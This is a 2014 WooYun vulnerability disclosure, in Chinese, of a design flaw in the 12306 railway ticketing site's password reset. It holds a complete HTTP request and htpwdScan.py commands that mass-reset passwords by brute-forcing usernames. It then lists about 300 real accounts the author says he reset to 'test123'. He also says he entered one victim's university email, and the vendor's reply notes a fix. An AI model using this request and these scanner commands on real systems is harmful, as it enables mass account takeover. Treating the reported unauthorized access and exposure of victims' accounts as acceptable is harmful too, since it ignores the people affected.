[公开漏洞]演示12306批量重置密码漏洞（可修改多个用户密码）

演示12306批量重置密码漏洞（可修改多个用户密码） 相关厂商： 中国铁道科学研究院 漏洞作者：lijiejie 提交时间：2014-06-06 21:13 修复时间：2014-06-11 14:41 漏洞类型：设计缺陷/逻辑错误 危害等级：高 自评Rank：16 漏洞状态： 厂商已经修复 漏洞来源：http://www.wooyun.org Tags标签： 逻辑缺陷 漏洞详情 披露状态：

2014-06-06：细节已通知厂商并且等待厂商处理中
2014-06-09：厂商已经确认，细节仅向厂商公开
2014-06-11：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

之前提给12306的漏洞被忽略了：http://www.wooyun.org/bugs/wooyun-2014-063025，哥还是详细演示下利用方法吧。。。

详细说明：

利用之前ping一下kyfw.12306.cn，然后修改hosts，固定解析到该IP。



POST：

POST /otn/forgetPassword/findPasswordByPromptAnswer HTTP/1.1

Host: kyfw.12306.cn

Connection: keep-alive

Content-Length: 228

Accept: application/json, text/javascript, */*; q=0.01

Origin: https://kyfw.12306.cn

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: https://kyfw.12306.cn/otn/forgetPassword/initforgetMyPassword

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6

Cookie: JSESSIONID=0A1E82A1441AF4843295A39FF9A11E51; BIGipServerotn=2362704138.38945.0000



userDTO.loginUserDTO.user_name=anfeng&userDTO.pwd_question=%E6%82%A8%E7%9A%84%E5%87%BA%E7%94%9F%E5%9C%B0%E6%98%AF%EF%BC%9F&userDTO.pwd_answer=%E4%B8%8A%E6%B5%B7&userDTO.password_new=test123&confirmPassWord=test123&randCodes=u6hc

其中session id和randCodes根据自己的值修改即可。



下载哥写的脚本（http://www.lijiejie.com/htpwdscan-http-weakpass-scanner/），分别执行：

htpwdScan.py -f=post12306.txt -https -d userDTO.loginUserDTO.user_name=pinyin2.txt -err=existError\":\"Y -debug

htpwdScan.py -f=post12306.txt -https -d userDTO.loginUserDTO.user_name=C:/cygwin/home/pinyin2.txt -err=existError\":\"Y -o=12306.txt

在12306.txt中，你可以得到密码已经被修改为test123的用户们。

上面的HTTP请求中，可以为答案设置额外的字典。

漏洞证明：

以下账号密码都被修改为test123，不信你试几个？

aidong

anfeng

banbing

bangka

baoquan

bianfang

binger

caituo

caizhi

caorun

chaifang

changyan

chaoang

chaowei

chendiu

chenning

chensi

chengna

chonglai

chuaizhuo

chuandan

conghua

cuanzheng

cuixing

cuizhou

daidong

dequan

dengyang

diexian

douniang

dugong

duangang

dunpai

fanlei

feigeng

douzhuo

gainai

gaishu

gangqin

gening

geixiao

genneng

gongnei

guainian

guaizhe

guanshuang

guangpin

nuanxiao

paizhang

pangai

panlei

pangai

pangshe

paogao

peizhi

pinsan

qianduan

qieshuang

qingneng

qiujing

quliang

quemei

quexin

qundao

ranjing

renmin

rilang

rongzhai

rouran

ruanlei

ruannan

sanshou

shaleng

shaiyan

shangdao

shangji

shaohong

shenping

shenshuo

shigun

shijia

shijing

shudun

shuxin

shuagun

shunshai

songan

suibian

sunjin

sunjing

suogua

tangxiong

tianma

tingleng

tongdian

tuibian

tuirong

waizhan

wanchen

wangrong

weinei

wenlan

xianglong

xiaofei

xiaoqin

xiaosa

xiaosong

xiechong

xinggu

xingzang

xiongfang

xiongkai

xiupao

xiuzuo

xuanli

xunxun

yajing

yanchen

yangsa

yaoyun

yilang

yinmei

youhang

yuangeng

yueyong

zancheng

zangnuo

zaoling

zhaili

zhaizang

zhaokuan

zhaoying

zhengeng

zhengjin

zhipian

zhongshui

zhubiao

zhuyuan

zhuawo

zhuaichu

zhuanghong

zongcai

zongnuo

zouying

zuzheng

zuolou

zuosha

bantan

benqiao

biaoneng

binqian

bingdui

bochui

boqing

cangjia

chajie

chaqin

chanxun

chefeng

chenyin

chengfu

chengliu

chixiang

chulia

chuping

chuzhuang

chuangchu

cichan

ciling

cuiniao

daigang

daipin

danjin

danglei

deiseng

dengfu

dengzhou

dielao

diemei

dinglin

dinglu

dingpan

dingyue

duhuai

duming

duanzhao

duotuan

enseng

fanghai

feichen

fenghong

fenglei

foguang

fufang

gennie

guasan

guaiha

guanyue

haqing

haxiao

hanchui

hanghao

hangzhen

heiqia

hentong

hongtian

houbin

hujiong

huading

huangfang

huanglei

huangli

huogong

jiping

jiareng

jiangqiang

jiaochu

jiehua

jiepan

jieying

jinpie

jinren

jingchuan

jiongbai

jiongxu

juchai

juanfang

jueruan

kanmin

kangrun

kaoshi

kaosun

kaowen

kejian

kekong

kengshen

kuaiying

kuikai

kuipin

landie

lanmie

lanseng

laomai

leiqiu

leixia

lenghai

liamin

liaqiong

lianfu

linnei

liuzhang

loujue

luqing

lushen

maigang

mehuan

meiwang

mengun

mengbai

mengda

mengren

mieduan

mindong

naidao

nanlan

nanrong

nengniu

niaorong

nieling

ningde

nongzhang

nuoliang

oushou

paiyao

pangceng

pangniang

pangwu

pishen

pinqiao

qiahua

qianshu

qiaojiong

qinxun

qingsuo

qiongfa

qiongge

qiuran

quanjiao

quepeng

quetong

qunkang

rexuan

renqian

rengren

rongxu

rouzhou

ruanmin

ruoshun

shaqing

shazhong

shanhai

shanlian

shanshuang

shanxun

shaoyin

shendian

shennan

shensuan

shengjun

shihuan

shihua

shinei

shujiu

shuaxiong

shuima

shunjing

taikui

tenggang

tengyong

tizheng

tiewang

tongnuo

tongshan

tuixiu

tuoren

waichou

wanping

weihong

weishei

wensuo

woseng

xiashun

xiannian

xiantu

xiangma

xiaoling

xieming

xingzhong

yanyin

yaosang

yingcai

yinggong

yingnong

youmei

yunniu

yunpian

zaidou

zaijiao

zaoshen

zeifang

zeishui

zenning

zhashe

zhaozhong

zhegen

zhenzen

zhibang

zhihua

zhihao

zhuzhong

zhuachen

zhuangchun

zhuangye

zongjun

zongzong

zunkun

我随便挑了个账号进去看（对天发誓，中间随便挑的），一看，居然是清华邮箱啊。 随手拿电话号登录邮箱，轻轻松松登录进入了，额。。。 鉴于早就破解了清华北大的限制关键词账号若干，就没有必要继续玩清华了

修复方案：

你们更专业

版权声明：转载请注明来源 lijiejie@乌云 漏洞回应 厂商回应：

危害等级：低

漏洞Rank：4

确认时间：2014-06-09 08:24

厂商回复：

谢谢

最新状态：

2014-06-11：已经修复，多谢！